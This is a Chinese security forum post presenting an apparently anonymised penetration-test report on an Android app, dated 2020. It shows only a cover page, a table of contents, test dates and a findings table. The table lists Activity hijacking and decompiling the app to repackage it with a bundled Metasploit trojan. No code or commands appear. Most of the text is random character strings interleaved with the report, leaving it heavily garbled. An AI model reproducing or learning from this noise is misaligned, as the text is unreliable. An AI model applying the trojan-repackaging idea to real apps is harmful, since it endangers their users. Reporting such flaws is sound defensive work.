找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4392|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
) r" Q3 W, s+ h: B: K/ E ! i8 F3 Q$ K) t3 V

- ~/ i& U( d% v& S, u0 n* k9 C1 ~ @ 1 R9 H. B& G$ L( x
" m$ }: n3 j8 G2 w1 C. _" s3 m- ~3 p- b6 E2 h" W

4 h4 c9 S# p3 w0 E& p( ]+ S- P2 k - R& j9 ]- \0 Z" { f8 v! t$ G, Z/ B% Q
* M; h; \# q7 _. P {2 y3 v* g 9 Q) C6 O) T. p m+ X3 I3 u. p/ M

: {6 Z; j+ |9 X6 h5 i2 b1 _* y* C5 s0 }' p2 k; A) J6 {' h% M6 m 文档编号:                ; ~" d: {) p f4 N- A/ l6 l3 g2 P! J; ]' H% z

9 g T8 o4 r% D2 U. J. K ; W' l2 L" n. D4 y5 ]# [

( a3 R: q; t' I- _+ ^ 3 A: B$ U% q2 ]6 E4 W2 l* o   % t1 i1 ~3 f$ D+ X8 W9 d1 a, ] 8 u/ k. r1 R8 J1 Z; H

- K3 U0 {; e: `& A# n; K) Q" B 2 J$ {$ B" t# c2 p- q+ C

3 O5 H& j4 o! [% e7 M6 ?& e5 T : O" v( ^9 @; k$ g4 C/ N- U   * M4 a0 z8 R0 \7 c* h2 Q: Q2 k. i# @5 H+ y+ o

- c: C, L4 m; d) S {+ q. n E% _! Z5 }2 d# |+ K" h" Z

8 U- p! y' p/ O% `& y - x/ z. H, ]4 r3 U# y2 {7 c   + C/ _- n7 r& O$ n6 B0 \ " d$ x; S. n' z' x2 X

' P9 [9 F+ H9 [) Q" O9 R' f# M * n; N# d4 R7 W/ A7 G4 c" w

6 f7 h7 G: M. a& z7 } + T- B/ |) t7 F; \4 J- ]: a$ B2 d3 i   . n! t: p% b) D4 i) F3 C+ Z: _( H* J 3 z* \; u' F Z, e$ g

) u/ Y3 a; ^8 ] : J1 t' L* v4 z- }# C

0 B* W7 ?8 v0 z% }/ g; l % y' {" G/ P S5 l6 J1 I {   ' H1 u) Y. D8 Z- T: s _ # v- }8 c( Q9 Q8 Q

1 z( v V0 ?" i3 e 4 m, R8 j% i$ {9 d

) O& J) i3 q6 E" T4 ^ " i6 Z3 _8 ?& y. S 某某某APP渗透测试 6 A8 L6 q7 v) |7 b' Q5 X, R1 c + B+ Z- B) T3 q/ N8 z F

7 {- C6 \' {8 V' M2 y- @ 7 S9 F0 ]3 h' W6 }/ _. H

4 J# M" x& j( D9 S- ^+ H, F9 G4 J2 v/ C6 J# M0 L. S4 J8 _$ f' X   3 A m5 m5 \/ A C$ H4 m 6 k# ` A1 I i7 L$ C, G: U+ l7 q

% v9 Q7 e# Y3 u5 G$ m * \4 {4 e* @9 E4 D0 u( R

]) R' s) b: y! b. e, ?/ N0 r# T t( { S6 a2 U4 W   ' O8 K& j+ X5 ]0 {1 ]. F & d' G" Y+ K) D; k: }5 V: C D

, K3 v0 i( I1 m1 I4 _$ p% H E 1 @- R+ h' e& I( r

& {5 T8 [- X9 X( q2 g % r2 K3 D s3 O3 m   , c k: d- V( @# \0 N9 b5 M9 n4 [% w

% d9 R! g4 w9 h2 A4 ^1 B: v& b. a( d8 N! x O) A

2 B7 J9 @ _3 U- g7 Z; ?3 `5 H5 X# _; X" y   8 H) i& [' s+ b : M0 T4 [( a: u. N& M

- f, q" p# J+ B# Y& m+ x$ w0 \ M& L% M3 ?9 f

. A2 g+ S/ }2 U1 b8 V # P$ Z8 H3 \4 W/ I) s" [ 技 术 报 告 0 h1 u- F9 {# j( G. R. B- ? : U2 G+ h5 B9 W/ T

+ o h2 W: J4 n" Q) ^ 0 v) W& K( x/ J$ b$ O

& H( B8 F* H! h I ; r& n9 D. s* b" U0 v+ B   " H5 Z0 H; E: m4 { 5 }* t" c9 r) D `

0 y! z. ]( G, B8 ]2 g 2 X1 G$ R3 O( I

$ f8 M: Z1 w* m5 Y4 p5 E# v7 t0 W8 P4 ~& O2 g% R# S& d   + T" V1 V( I" t3 M) r8 Y1 Y% D 4 y$ _( a, L* }0 I, w! ^4 k+ Z

% g: ]2 O- u' L: v) N, W$ `$ v - Y* b- S3 A# |* q, p% E& |' d' ^: M/ q

; R( _+ g3 x7 V. B2 Z7 u) ^% r4 I . Z. W: L9 U" k' a& ~) ?; U   0 S6 w6 T$ r1 P4 D h4 ~ J 8 f, y3 x3 v) g

; m E1 J" Q$ R' e: j6 b, A ( p5 X* |7 V9 b& S" I

1 U1 w8 d c% p2 u1 O7 v3 A4 Y5 h; |7 t' O+ n   $ p& L4 G. m3 h& R 0 {9 M/ ?0 j3 c3 J

" ~- g9 y/ Y, B( j , G5 E+ X: l; S4 [& _6 R

/ ?$ L! u4 _4 j5 J( Q" ~ - R" X# u& K+ }$ d( x0 V) l   4 q, B. r T( b9 z : s, m/ {, N7 S9 O! V

2 Q: |; I1 q( z( V& S" ] 7 K5 j V: r1 P4 K) |

/ U, D4 h' @. W) |/ Q Y! W# u 0 q' A, ~2 e: z   7 ]7 ~6 C" y0 Y3 A5 F, ] 9 k* H7 N7 {+ v+ {1 U4 m# q: u

( @( B( x; y; [, |' N( i * f) _# E# a9 a: N6 K8 Q

" c, d5 F5 w/ g! N; B) [ , y* G( B( D( |/ a7 W   0 H/ T# k& X% h2 H% d. T5 {! O + H' D" @7 ^) b' V) x

0 c3 y3 T3 [+ f. g# S c. \2 b7 L! ~' V* F3 u

5 i8 p5 Q+ t$ y- E1 T9 o , D, c, W: K2 j* ]7 [- T   & g; [" |3 e4 }4 R+ P' D& @ 4 I! F- ? _1 C# r4 z7 Z

* T5 t; s C, \* x/ r: g3 K+ I0 S& ~! G' {

8 `7 B _% x1 s! X g1 S, S+ [7 l" V% q! h" X0 @   ( i3 v' ]; {) i " u/ g1 @7 H, q$ @( `2 O. M& i

: ^: T9 e5 E; T5 C' B7 k% k) I* D+ L " @; ~: g! q9 R; x8 `6 ?

; B% C3 V) E, {6 w. j y 3 f/ @+ c, `4 d6 a   & o' M Z' f8 z. u5 u$ L) E' M9 k$ i# q9 f$ Z d

# b& C: S3 @( Y, F. M& w& h 3 e8 C7 b6 i; D: S) r

: R5 V1 N/ a$ [1 V7 v; d & W* P( L+ d8 V$ l0 p" Z$ o C( O   ! p9 e: z7 V' j' B! M$ q/ [+ G7 F- j! q# X* ?

; F+ I+ ]3 ^ ~; o , d! y# z9 q: z2 R. t5 T1 M

0 K1 H* e' W% q& ]2 w 7 A* k# D U1 D, Q; L   3 h+ E' G/ p% i) i/ N( z3 L, O# V % B% l/ {5 t) w% V

# ~7 c1 H; O- Q) |1 a ' k. D1 h6 R, G" a. M- r

% Z) k6 V4 ]8 |5 { ' b8 M: A F4 y$ Q& w7 U   & h4 c( n5 J# m, t3 N9 H# |/ O# u: D- m6 ?) L

6 ]7 s0 v! B* o6 D G / N; s; J! K$ N4 c6 T! W

! e% C9 `0 z+ M7 } s3 s- o; L4 H# P8 _/ e; i3 k# s& o   + m! q5 D+ e( N/ e/ B * S+ b2 u7 P, A3 B J) p6 Y* {

& X) c. V$ R. o+ b( B/ j$ B8 [1 s" l/ f

' m) `9 ~6 A( _- H + m5 [ r$ D: j% L" f   + o7 o s& k: b Y7 h2 l/ b % N4 A" a- ?4 e

/ [4 O9 i6 d2 [# u) W# w; r. E" V) I+ y, |$ T" l# G

% I# K: |9 h8 }/ ?6 |( U( s) }& `6 d& a/ r8 S& k   4 y( y7 m8 e# u2 p4 e/ Q, R2 ~4 e. x9 |

3 P% y6 r$ N0 m( g" j2 V # ?, ^9 J. R0 q+ F2 V$ U; ?

4 S8 j! ?" p8 r' e ' d, b& H0 ^1 l N   - V3 e7 i1 @$ ~ ( j, V4 F" M6 r+ j. z- j

, B K8 R3 ^0 J r, i 1 d- ~( J/ N6 a2 w7 `

* W3 t* K+ j3 ]5 C7 Q3 R7 u8 |) u# b! P+ u   7 i& e1 Y! g0 w# t- i" c # `- f/ R1 \0 q }

# u; G Y2 [& r* Y4 S# d& G' t0 u i% V- F- |( a# P- C7 j5 v, _' U

! ?& ~& }$ P4 V. c* j3 j . u0 m$ Y% N: m% m" V# k 二〇二〇年 / b+ q# O% Y$ y& J; z : ?, [9 y. o: L" c1 Q; a7 ]; g

g1 v; E, h6 E9 _/ g & k2 [9 O1 x8 E8 Q' e
% _/ ` D- Y3 I. d* W7 a' G5 C 4 R2 j# M" z1 B8 Q0 L7 H' w9 W
6 c: ~: J/ S; H# m+ t0 [; o; l+ V
4 m+ W! x: O7 L% Y& }# V8 } % H8 R/ t/ L; ~, s9 [5 U
" s. G5 X+ b# ?2 p3 [( ~: t 1 V4 W3 K$ p% q
. m+ o! j+ @+ F, ~% | * J( R) W6 e; C2 M, G! ]& C
8 T$ s% E r5 A [ w! |5 D) f " J2 }/ q9 v/ K# L8 f
$ x, Y5 b. y6 H7 o) P9 G: V 2 {2 w' A" w- w1 u& Z9 V1 d
; e. e8 e/ ]5 K( S ! J& }. g3 K2 S. n

# j2 N$ K0 f; l( c! A( a5 M 6 s+ |9 o. S+ u" M; v( d0 | j: _) e 目 录 2 A- N: M8 ]; I( { 2 Q* O% f' a) W% a2 N9 w

+ p9 g4 P1 ?7 w( ]7 m 4 O1 r; b* ^, X . a& I* ~4 y ?0 I; ~* x( L / A4 ?* d' m8 V

$ `" n0 W# {; ~# a' z, ], f& c& ]" l+ @: a; t2 v; U   # M5 }1 X& y" O6 I- L/ O. L# X: F1 t* h) w& ]

5 k8 C8 q& }! t8 I& L* s5 Y, {$ m: p! f5 u, W7 ]

8 \0 R/ g9 @% j) \0 h 3 i `) n' g H _ 1 概述... 3 5 U' F1 s. a; O* u3 V - m# D% e/ R8 \, L* R

: k* y7 t( e! G$ q ! e1 z8 P9 F N3 e

9 ^ i+ X3 \7 M1 R - B( p \0 C9 _8 i# W7 ?* f 1.2测试时间... 3 % O; N4 w. z; _& q, D$ c7 A ; U; Y/ s2 a; m e) D9 ^2 B

3 u+ ^ M8 W4 `) B/ p a' K9 b! x: a r1 Q

. F0 |- s2 @6 i 4 {- X0 _. A% v6 } 1.3测试对象... 3 : p7 f/ g0 w. B3 D7 Q# I {+ B# \1 P) [* }3 g' Q- n

4 z# t# d5 {" h 7 X3 Z2 o9 m" B" |

. _# M" a2 D3 c6 H % N' u8 D3 i% D. c! V2 \0 ? 1.4测试结果... 3 : { J% R7 u( x$ t8 D( f & A7 {& |1 V3 y- C+ \6 L6 w [: L

4 t0 R7 r, H& g$ E$ @7 l0 | 7 N% T% c- O' l1 X+ } A; E! L

/ ^ t/ t8 R, \0 h4 Y % q! G" w2 _# } 2 检测结果... 4 4 L" }# `) x/ b ! {0 g6 F% S$ }( H0 p

+ r6 ?2 c6 }3 j& U: F: v m: J $ u& |9 D, j! I$ l

7 L/ {* m- ?2 l7 X1 }. u , E1 r& N( ~( B 2.1 某某某... 4 8 y8 {: l) D- s4 R% b& U3 e, X4 P 8 p" G9 k" |) [+ O

/ s9 a" l& s0 x8 X% l - l- d( o+ ~' Q2 U/ P6 V

. y8 M: ^* i9 u' X 2 y- G/ A5 Z* G5 h+ s8 ], k9 H4 k 2.1.1检测目标... 4 : N$ |2 ~/ Z. }# Q $ ~* W( Q: ^- E. [7 W, n8 n

- Q1 y8 D, J- ^6 D7 f$ m+ U( j# k( O+ G

2 K# E7 _1 ~9 H4 \! N & }8 D X9 w; a 2.1.2检测结果... 4 8 k/ q6 L, q& k: x* y( y/ D( V, E; U( O% C

/ D! e" N7 x# |7 \* R2 r 4 O/ V& u5 k q9 k

. [- B5 \6 j w$ S6 n, ] 2 \: @9 T! P9 e y: F( i 2.1.2.1. 4 2 r0 P, u2 p( r: L/ l - m, }5 e) u1 o2 a3 _

+ i9 j- `' `/ U/ [7 v2 w 5 M& Q& ?7 d3 ?+ i

- \$ W/ k+ `$ A# W. m& \- F- `! V/ f0 T 2.1.2.2. 6 & q) [1 q* d5 v$ z4 n2 L2 ~) p+ _& {, }: B! p% c

6 e! F' r/ A1 N 3 j( N7 r6 l9 K7 g" f

* N$ _; K% d3 E2 u& k, s% P 9 H: W8 H4 t9 k& m$ V0 u0 l 8 `2 N( }/ E# S% r. B6 U% w- s 4 f4 U; W# o( @* @* x8 Y

# c, O9 I. J) i) w) v" j' p ' \/ R6 l% ~( e
+ Y# D9 A5 R K7 d8 q8 ^5 t& x) k# d- |
. ^9 b7 w. {6 N* T0 I 2 s5 f7 M1 O2 d! S8 y4 [2 p
. S- Q* F% D% o" t# b/ H" @1 q* H o" R8 c
! K) B+ U5 q- U! V: j2 q : W; X6 f7 l$ Y$ r e4 Q" V' S

4 y0 I7 A$ V5 n - _) f K w, E, _ 1 概述 4 v6 R) }3 m# B ( K) H, z- V$ y8 b6 W

4 P+ X" [1 _3 a: @8 D' E, `9 m* r- A Z0 [

( ~& D3 x( D1 g% K+ f 5 w* B$ f9 W& U2 C 1.2测试时间 + q, T+ ^; s8 J: r( X% j) i W' x% j0 X

' j1 G* M' W8 ~# X 6 P3 t t) N1 p7 R2 A. K " w: Y8 }3 A0 O: G q- s( _6 Y" m$ D; R7 W8 N% X- {( T8 I9 p! s$ X6 w1 J0 q* w) `% Z" L! Q2 Q* L4 I( q" M& p/ e; a+ y8 Y# t+ ^) R( A1 q) ?0 X3 v2 @4 Q3 F6 G2 J8 B4 h6 }0 a; t4 ?* v8 Z! `7 Q% ^" H0 \6 M/ r1 `! [, @) B( W0 N5 k% e5 B: k. p9 Q6 J& q% S& [. B2 }& Q! F" o, P: H1 J; f/ a- U% n! j2 F) X' i& @" e: s$ d0 u( }: p2 B9 J% m- Z+ `& b9 }; y6 o# m: Q+ [1 X' ?4 e: l0 `+ q" g( Z) m" b8 M* p% }2 q0 r+ z, t p6 V$ |( X3 K- {, o: j9 P7 _% b) d2 k8 n! k/ C7 U( c' w$ E) p6 ?( }1 z$ U3 p+ a4 V+ E3 e2 e, h) G+ r% t/ E$ G6 Q( e; y8 M# b3 i0 v- ^( D- M8 Q; Z. H9 [& I8 O h" Y9 A- [: Q( H2 {; C$ s1 o0 Y5 e5 R2 g& x, `0 A+ K- N/ O) a- z8 S5 N3 ^- q. D6 f8 ^7 I _ g6 B
# S9 p4 x; y2 [3 O9 h. P 2 o8 p3 ]' y( r) i$ s

1 z, L1 Y, \2 Y x. t8 P! n9 |$ w - a; s* v8 E* R- b 渗透测试时间 " B Y- F8 }7 B6 q 7 w7 i4 |4 G# w6 L' z" F5 C) y$ a* @) D

; `! M/ Y4 R+ a, `( g2 G# ~ " v' S, L' S3 X& c- K4 g
7 Y, w$ X- U$ f* ]& t , {( O0 U& m! p Q. p; p* X' C

% u: a$ V) E+ }. }, E8 A! d w ] H 1 L ^, K+ \1 q( g+ p5 y! w" Y 起始时间 " r2 H# B% Y1 u0 {1 ` ( `5 g/ r4 x' |( |

1 ~$ P. {6 G9 W6 ^% O. u G$ g+ |0 g0 i- B. P
; I! Z1 z- |1 r" M$ \6 ?3 j5 n % T' m% I+ Y5 O* c

: O# d+ Z, E/ ]8 B7 T$ Y 1 h- C1 \! {* j+ L3 Q 202046 2 G2 q" n& K/ U/ u& P* p 4 C+ R' r; P" s j e

/ H* k/ I- }9 J4 j6 L- h # K% \8 u; w8 O0 Y
7 i ?* \+ H/ G. b: I ) |, J6 q4 L8 \+ B# l! x6 w0 @

. p6 u! D$ G6 ]0 S7 d 6 A4 e* Q9 p' a+ h) ]6 a2 V6 v 结束时间 * o7 O0 r9 @! g' o9 h # |% g- p6 s, c$ ?' j) s2 N' D

! f& |& B$ q3 D1 E+ W) A M , P# k" U, Q% V
& B: t; G! c! m5 C0 v5 l 1 R' a6 k4 P1 l) E, [4 z3 h4 v

& {/ e% ]7 [% K, W ' G4 v% Z8 E3 F% U1 W# L 202049 ; z1 G4 T; c* O! S: ~( O9 K ' j) w' ^/ g4 j0 h

; s( }7 |& W2 o7 v7 b9 W1 ~: d& Z7 E8 V; }" ? k
; V; T4 e/ ?; N0 {8 Q | 2 T3 f4 X. n8 s0 I# s

1 S- K$ x( F7 `6 E* R: ?8 {, r; Z, c+ Y' Q% R( Y- U6 N0 b; M* _ 1.3测试对象 ; Q& U% T& Q8 {' z 3 I; E; V9 h% ]$ b1 V' u- y

. u+ l6 f3 l- \. j1 @6 C: H, A 0 Z2 v, k7 [7 J/ |. F

# a, k0 M! Q, f2 h9 q* u 2 X% A& H7 j; R N" w! q& H# r 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: # b% g& I2 L+ l8 X 2 a# I% w. L8 ^1 W( w

& a2 g/ a M3 T1 d3 N ( x% s7 U0 x3 M1 c& l3 U: H$ z

* B; ?7 b) n0 i . H2 |* O( Y: [0 c! r5 n5 L0 } 1-1 检测对象 7 X8 u) b& ~$ x ]& G1 j9 e, S % \- N: V* b [0 ?9 I

. T# x. d; p# U# u, x7 l% ]. \8 X2 D& L3 |8 G1 v8 v6 M- I 1 T/ v) G! x8 x8 ]. I2 M, H6 g& T( R a) L% A2 H! d2 }) ?/ L1 K7 {* R$ U* @7 w1 i9 _6 ^( [" H/ \7 U W7 _# @3 F( N2 U3 k/ Q. y$ Y' {/ s& s+ C0 I% ? A0 [/ _' F0 i- u# A( t! _; H, @0 H5 v6 Y( w7 n# l. D6 S4 _) ^/ h/ J+ N" n7 d6 u( s# |: x1 C/ g$ C3 d( a; N4 j7 ^' A" q5 w+ v; Q' P6 i) P$ \& _* ]4 h5 H6 w: F4 l- v+ m: q7 t5 G! }: M8 O, l; B; [( D& f6 b2 f* D- a" \+ R; @6 {" u) Q0 t: I8 _. M$ K' C( Q/ ^2 M1 m" N R |8 A: d0 s. n7 `) ]0 q$ P- N" V9 E% j5 C+ V0 ~: H7 M2 P# V6 `4 z% @2 n0 z2 a6 Y( n# {$ w' q9 ~4 A! B' g, p" Y2 T/ S& p2 |9 J' F- @. @' t/ N$ ?( w) L0 O' `, m K& P/ `2 f f) r4 Q9 B* d8 n) |5 U% ]6 E0 O( ?" T+ @7 z4 a" E1 u# ~/ s+ |7 o4 X' X# m$ b* W$ T: \% O O5 Y1 B, Q& P+ \' l* {0 _7 A3 y3 r0 J/ M) L- P
5 k9 z. p, [/ _9 q w' m0 Q v( B8 u; M, \

, S& o3 j, n. r4 `" R u1 A& }' N, z8 i" Y 序号 5 B! C% k) \* h% J1 w ' {7 n( c+ P& u' L

8 w4 B; L8 U! _8 ~4 y& l7 p% l2 \3 n2 u
4 N+ ~% J9 Z9 I7 Q3 a( ~0 R9 q/ L: B9 Y) P8 M5 |

& b9 B1 e" W8 c) @2 ]5 C . h9 S; B8 A% F: [( @: R$ A 测试对象 1 F7 e+ v/ k( E0 O/ C* C9 c2 j ) H; \- m/ H+ Z4 O2 k

. }3 ^! ]: X* T5 y/ |2 I& z) k/ }# t5 B
& J. t% k- n" P 9 o, j, n0 k: K3 T/ @

: t: ]7 s. C# d7 b# d / Q8 t0 X$ J' o3 i8 H 测试地址 - q& i9 B* \- ^( l/ O1 E 0 G0 u3 g" Y4 \) @

' t: x4 {! V* U) Q & K# u: u9 v# o# d
1 v2 z5 X+ k5 c ( p8 S% `: Q# R4 n, K5 O" u& {: m

* @. Q3 O. S' `5 n1 v% w! t9 \4 ^+ j 安全漏洞 + R; \. B' `; J7 |4 x$ L; F m0 Y+ p- g9 R1 M

6 |- H, L$ v5 F 2 r% u. h* A. p6 m. {* c
0 W) D7 [$ X; q " Z0 J9 Y9 x9 j# s @4 g% l$ @5 _

8 r! o8 @" q' Z4 M& `- ~6 Q7 h4 Z) A: d6 d( u8 t7 x1 h9 c' U 1 9 j! [' s5 R$ Y8 i* ?' { % M. |0 q3 A/ X J; a* y/ T

8 T* ]2 |' d! U, w; \- \" P + Z5 A# B( N3 X" B5 M% O
% Y7 P3 [4 b# H2 [, l ) F6 X! s, s0 o/ Q* i

5 G' V: D2 A1 P- ?- Y A9 D4 k( h3 {0 P6 f i' j2 w; ]$ N0 ~ 某某某安卓APP 6 P/ S& `$ u( H3 g/ S# B/ z8 v- k) X# e! @

8 B% z. s; M/ X! h% o& H Q- y; Q7 g1 W' q) U. V. q) [
( {7 Z7 n8 T. U+ l " r: i8 `/ f l9 V1 n

; p# n1 n3 s5 n( m & ^! V% m: d3 V/ W& v5 b0 t   2 N2 `/ \# F8 P5 J& R5 } 4 J, Z3 \$ f9 |. H* O

N! b" e3 e# L' y* J / `, W+ R9 H) E
- \* u% X4 @4 G2 V2 S/ I0 [ Z6 W8 O" J. N3 t0 G

9 I9 w9 Y4 s9 ^( F; V( Z) c$ r. k# a7 F% b3 N 2 4 ]% o5 V; u% k: P; c) B & g- h: N) \8 i! f; H. `1 G

W% _4 a& ?$ f / M4 c9 e, X1 E2 [; l
5 c$ P L) Z! O7 G' w# d; h ( N9 |" v A* x2 O

$ S5 }; d( K% m' p G5 B% n * G. H% w& P9 z4 `: i# E6 q( U8 C 1.4测试结果 + |% j+ D4 _6 w0 H / A( B2 v( L! b3 G$ e

$ X8 ^6 F3 M: q/ L5 F- C* L5 D6 z- M: O5 j

; V' b6 h5 k4 \- E2 ]9 x3 n o0 { : t; V9 N+ g3 s6 Q0 b4 @# d 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: * M: E7 N- T n( T8 R S 0 Z, o% \6 r* @ z. p

; q% F. B. G1 F 4 |# v' O7 L+ O9 C3 S

! t/ | @) G2 ?: o1 O ! D' ]8 n6 i( ~% x7 E   5 M: E% T/ B2 n$ J* h# u- {+ K( y * O4 X5 u' ~: F8 T1 A# p

* C* v2 U% S- N# E7 q , y3 ~0 a2 r3 i* \ T( S, K
. i! Z n' ]1 A0 w) @: J! C & W6 h+ Q; R& g2 M/ } ; G m7 T! R. t% R+ n% X7 \1 ?, y, j2 N2 ?% ?) l* J2 w- R% x' X1 g3 c2 e7 y+ {6 [* e# q5 A& A* n2 V2 K- ~4 `1 u; a6 e! @2 \0 [$ h1 A0 U& j% k1 ~' X9 C: C8 ~, Z( O. M! y, J1 k9 B$ ~1 [& @: t: ?5 J$ W- R- q3 ]) J; E: ?& X4 p6 r9 p& C5 f! d: G. s3 C# k0 V$ j2 o/ c( Z1 x# G1 J# Y& y6 G ?6 d8 N/ E5 Q/ y* y7 J6 h! `- U/ |; v' q1 F+ ?$ Y5 Z+ }. c3 A6 C/ R N: t Q- a% M, @+ o* z/ g7 ]. T# G& A" ~% C/ d, @: g" p7 ^3 P& @3 i( c. o/ U0 o! _, R6 X0 M$ o2 Q2 i4 b9 P& y4 L) B0 G. P0 `; }3 ]) P! _$ P# N% o( E$ B) W! Q( s% U- C2 G( O5 q% |% a' q, F7 |7 m( [/ M/ I2 j; P: w1 P1 w5 J3 [( @* Y& G# |) L- I( p+ W# q @9 q0 }& U0 `! [1 E! B9 z5 a7 p: I0 ^7 d/ l% |' Q' `) ~# m% Q' J: b! n9 z* o5 |+ b: J$ O! w# a1 q7 A, R: g M7 U+ W& r! r' R* P' ?6 o2 w+ |" J a" I5 q: @7 G- w0 m0 A f( L! b5 g6 k/ H: ?- D1 O( e" ~# Y5 K. a" T% e+ }9 ?! w" R' L% h8 |' K4 `7 L# ?; j" W; ~0 K6 w& G. l3 B/ i) O* K& A1 u2 U" b* l& h' S' I8 s1 k" v4 ]4 S4 P9 n5 o0 p; q6 T% H* ?+ b: H% `& Q3 }6 Y2 _) u* J1 l7 m" P/ Q1 S* T0 i; i4 d# ^- U" O4 Z4 p- U! ]0 U, d. }* N8 p* j! j8 l, ~8 k8 D5 {9 b1 ~3 u$ E( f: g8 `! H8 Q" t; c- e7 ~2 y/ A9 c1 Q% \7 d( b% }* B$ y) r, i- k6 T& C7 c& e$ a; v" u6 t% x7 B O$ ~
$ Z4 m4 {) B' a 0 N- N! K/ k: w* @$ l# P0 o/ t

3 X8 K& \. B& | e/ l* ] & |; G# L% k" d. C8 `' c 序号 + Z. E5 d) n: m) ?+ v* i6 d$ a, z7 t

* C0 _$ A% ~: K* L * A# k1 \: u3 t- b }
+ o0 ^% y" u% }' S- M$ T1 Z 5 x2 ?0 u4 b' l! }0 R

" \* }2 O8 a; U3 V) p) _ Q! J, f5 A( W+ A4 }0 E$ `( _% d 系统名称 " t: X# }$ v; n6 O( Z 6 \9 J0 U4 C( B. F

. b3 q* \' C( f J& U# D: N + V, z6 K* }/ X m) r( Q7 Z
( _4 x8 j* S8 ? ( O" S" d+ y; u2 Y

2 @9 q4 M1 D( \8 j& { . k" n7 }6 I, d0 E' e# X, D 漏洞名称 6 [! n$ t* A6 ^8 U1 o 4 G# G9 O- o* T8 e7 `- _

# q8 R: ^" o8 K ' u- d; q& l3 n2 e# E
c+ P/ h& o" S3 D' C4 c4 @( D0 D" c# T2 y. `$ n- b

/ ?6 l" V& S8 t: I, H* ~( | % Q6 g4 F2 s3 ~# B, y+ w T 漏洞危害 ' W( ~+ L1 F+ J- g5 _$ b : `5 ~4 }" [9 g1 D

7 f8 T. Y8 h# N5 A- {/ @4 b) _ 8 F+ W2 S+ A2 D% K
a6 M2 _+ O" F 2 ^8 c: N. B7 K* K+ Z* h

2 ]: |2 ^1 O4 x I! V y+ d+ t4 p) w $ J8 N4 T( A% E8 P5 {: P$ e! M 修复结果 $ e2 J3 B' s8 ~5 p$ s+ I! U; ] 8 a% n6 t% q9 X' P8 v. \! o

! g3 Q3 |, G' g3 J S5 B) i2 S) G* K. j$ P+ a- r( q2 C$ u3 J2 R. J' D
: ~+ k8 p' p% c. g; m" y4 J * F! l6 B6 f; k5 m0 Z# s4 S, |

' U3 ~6 i7 l+ p6 L * P3 p- i! k9 G4 t 1 7 U2 e( [- E' v; T 4 x/ n7 u" z4 j! H% \

/ v) w1 |1 X* S c) c1 {" a) s & E' _& a3 j. e V" a, a, [
. D0 w# b$ m& z& z$ u1 {6 W! Z$ R5 Y! U; y0 b, l, c) [7 G

+ N7 Q: y2 B2 C, ^ 2 u/ }, _: `: O, F6 c6 Z& G 某某某某某某APP . r% C! I8 k# [, q- Y6 y' t9 j; ?+ L% S2 x* P* N

. }) @+ Q) ^$ c# F2 ] ' B4 X# v, b. r# ` q; N/ e
3 T8 C, y+ V* T9 D7 K- E9 ? {/ f* l+ y8 o9 _0 k

9 ?3 B! {. q. e4 w+ w1 Y* @0 P8 o3 ` Activity 劫持 4 W- o7 L7 P4 E7 a \8 }; j% P4 _" ?9 x

# u; c' ? m: [0 O: K5 ]# G * ^$ P" j' f3 H- N' U

s o" Y: i- E) t 7 h# `+ B% u% p" o2 |! j   0 ]' d& t1 @& S4 j$ l 3 }1 s$ ^* o$ D

8 `# A# `. G5 P8 F " i0 U& H A d! C# o8 c5 k" h, q3 O
: Z S2 Q1 f; X g' {# s * ^$ v c: c% |" e8 F

& S* d0 v, f$ o2 W8 K* i- t( m ) R; g2 o3 j' }$ u/ h ' x$ O9 }# l( [' y: Y& Z% j# S" F3 h) G8 `6 H8 F4 Z; _

5 w$ D* l L# ?3 n. C4 S ( n5 c0 u' r3 {% O( ]0 }$ t4 q
, t* o7 Y6 d. E; l) r" X & p5 I* }6 e! K- a

" L* c& A2 k8 o& [; u/ g- J3 J% m; u' D   ; ]2 N( l5 G# D- n4 g( p' a* ^! R( j; e% j( m1 R+ i

* Z7 ^3 }$ K3 z- j" k 8 Z" ~% N& X& J$ F* n; M5 E( l) o( w- P N
$ ^8 p0 g* E4 Y+ c3 F, { / ~" i% b7 U/ H6 c0 `

v* M) x0 y8 r+ Y ^ 7 M5 R/ m& a& [/ E2 d( n S 2 * T2 j, W) Y* K; W0 X9 J( F 4 d9 D# j& O2 S% d

( I) N( H4 m9 u V( W4 b4 ^. O 6 o% |& X* O" B2 Z
, w7 D2 r; I( K 3 q7 B+ X4 j$ ]' r, b: J0 v' S

0 p# Q# H% I- t1 } 0 C) P3 ^7 Z( [) [0 }/ K 某某某某某某APP 3 {6 N) A, P7 i6 l& R 9 u- a n: Z% e0 M% A- N

+ ?/ U" p0 r1 D: e2 c: Z) P' u ! Z+ j5 i! k9 _! y! E
/ m O0 }4 k/ W4 Y' h5 q5 d5 c * s# g& y7 E) S( u( u) O0 b4 T( D

9 `2 E8 ] e+ A/ b( L' H( F9 V; \0 x! V' I6 o l$ v; } 反编译二次打包捆绑木马、篡改APP代码 ) h( q( t; e+ Y+ O5 O $ P# ~8 r" D' s1 {0 Q, ]

# u0 p M) t$ D" X7 I6 j# p , Z$ _6 y% k. ]4 J$ U
+ b8 |/ v4 [% a3 F9 ]) g: e7 u 1 S* n+ `: \! R0 c. V% u

4 z$ P. _7 Y$ V7 Y % }+ W0 Y! _4 R. z0 }$ U( k $ }/ }% C* ~5 r" Y6 W4 m: e " i& w! m, o8 G6 j7 C% K

: C* B9 t$ G$ ~# K9 H $ F: f* @, Q0 C7 A- K% p4 U& X
1 @3 x% y5 Y8 e0 ?: i- L! }7 z- J7 s+ S, Z# Q M" W* O

2 H0 U1 A5 h) [# s, \6 w+ T# J * m( N6 L0 Q6 d   3 ?7 N1 f8 K9 ^& I 4 r; B6 @1 f8 O6 h5 \4 v# R

- G) F# G% n0 V4 \ % ?4 d0 M, U2 ?8 [
" N4 H/ X$ e* u: f% u3 H5 a2 W" J, ~1 x* d- I
! j) t+ i1 G" G: Y# R( s8 l 0 q: U, \) {$ @: R* b

& j# }& a Z: | ) H$ d0 B ?3 }   1 \$ @/ R' b( J: |$ ?! W @9 E) b% D/ Z6 Y' G

" b9 P* r' V: z( l% X& s & [2 e G6 a& O& \. f9 o

